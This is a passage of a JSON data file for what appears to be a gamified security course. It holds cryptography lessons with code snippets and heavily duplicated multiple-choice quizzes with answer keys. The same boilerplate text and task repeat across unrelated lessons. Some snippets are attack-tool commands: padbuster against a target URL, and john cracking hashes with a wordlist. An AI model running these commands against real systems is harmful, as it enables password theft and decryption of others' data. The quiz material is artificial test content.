proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"rainbow","cat":"Cryptography","title":"Rainbow Tables","diff":1,"xp":75,"intro":"Pre-computed hash lookups.","sections":[{"type":"text","content":"Pre-computed hash lookups."},{"type":"code","lang":"bash","content":"# Pre-computed hash\u2192plaintext mappings\n# Defeated by salting"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Defeats rainbow tables?","opts":["Longer passwords","Salting","Stronger hash","Encryption"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"sym-enc","cat":"Cryptography","title":"Symmetric Encryption","diff":1,"xp":75,"intro":"Single-key: AES, ChaCha20.","sections":[{"type":"text","content":"Single-key: AES, ChaCha20."},{"type":"code","lang":"python","content":"from Crypto.Cipher import AES\ncipher = AES.new(key, AES.MODE_GCM)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Symmetric encryption uses?","opts":["Two keys","Same key encrypts and decrypts","No key","Public key"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"asym-enc","cat":"Cryptography","title":"Asymmetric Encryption","diff":1,"xp":75,"intro":"Public/private key pairs.","sections":[{"type":"text","content":"Public/private key pairs."},{"type":"code","lang":"bash","content":"openssl genrsa -out private.pem 2048\nopenssl rsa -in private.pem -pubout -out public.pem"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Asymmetric key count?","opts":["One","Two (public + private)","Three","None"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"pki","cat":"Cryptography","title":"PKI & Certificates","diff":1,"xp":100,"intro":"Certificate chains and trust.","sections":[{"type":"text","content":"Certificate chains and trust."},{"type":"code","lang":"bash","content":"openssl x509 -in cert.pem -text -noout\nopenssl s_client -connect example.com:443"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"CA does what?","opts":["Encrypts","Vouches key belongs to entity","Stores passwords","Routes"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"ssl-atk","cat":"Cryptography","title":"SSL/TLS Attacks","diff":2,"xp":150,"intro":"Exploit SSL/TLS weaknesses.","sections":[{"type":"text","content":"Exploit SSL/TLS weaknesses."},{"type":"code","lang":"bash","content":"./testssl.sh target.com\nnmap --script=ssl-enum-ciphers -p 443 target"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Disable completely?","opts":["TLS 1.3","SSLv3","TLS 1.2","TLS 1.1"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"Base64 is...","opts":["Encryption","Encoding (not encryption, easily reversed)","Hashing","Compression"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"pad-oracle","cat":"Cryptography","title":"Padding Oracle","diff":3,"xp":250,"intro":"Decrypt CBC via error analysis.","sections":[{"type":"text","content":"Decrypt CBC via error analysis."},{"type":"code","lang":"bash","content":"padbuster http://target/api encrypted_value 8 -encoding 0"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Vulnerable cipher mode?","opts":["ECB","CBC","GCM","CTR"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Symmetric encryption uses...","opts":["Two different keys","One shared key","No key","A hash"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"john","cat":"Cryptography","title":"John the Ripper","diff":1,"xp":100,"intro":"CPU password cracker.","sections":[{"type":"text","content":"CPU password cracker."},{"type":"code","lang":"bash","content":"john --wordlist=rockyou.txt hashes.txt\njohn --show hashes.txt"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"John is for?","opts":["Encryption","Hash cracking","Scanning","Web testing"],"ans":1},{"type":"quiz","q":"RSA is an example of...","opts":["Symmetric encryption","Asymmetric encryption","Hashing","Encoding"],"ans":1},{"type":"quiz","q":"A hash function is...","opts":["Reversible","One-way (irreversible)","Bidirectional","Symmetric"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"rsa-atk","cat":"Cryptography","title":"RSA Attacks","diff":3,"xp":250,"intro":"Weak RSA exploitation.","sections":[{"type":"text","content":"Weak RSA exploitation."},{"type":"code","lang":"python","content":"# Small e=3 without padding\n# Wiener's attack (small d)\n# Fermat's (p,q close)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"RSA vulnerable when?","opts":["Key size","p and q close or too small","Public exponent","Padding"],"ans":1},{"type":"quiz","q":"Salt in password hashing prevents...","opts":["Brute force","Rainbow table attacks","All attacks","Dictionary attacks"],"ans":1},{"type":"quiz","q":"TLS replaced which older protocol?","opts":["SSH","SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway Portal","Protected General Purpose"],"ans":0},{"type":"quiz","q":"A certificate authority (CA) does what?","opts":["Hosts websites","Signs digital certificates to verify identity","Encrypts email","Blocks malware"],"ans":1},{"type":"quiz","q":"SHA-256 produces a hash of...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1},{"type":"quiz","q":"A timing attack exploits...","opts":["Weak keys","Differences in execution time that leak information","Network latency","CPU bugs"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key 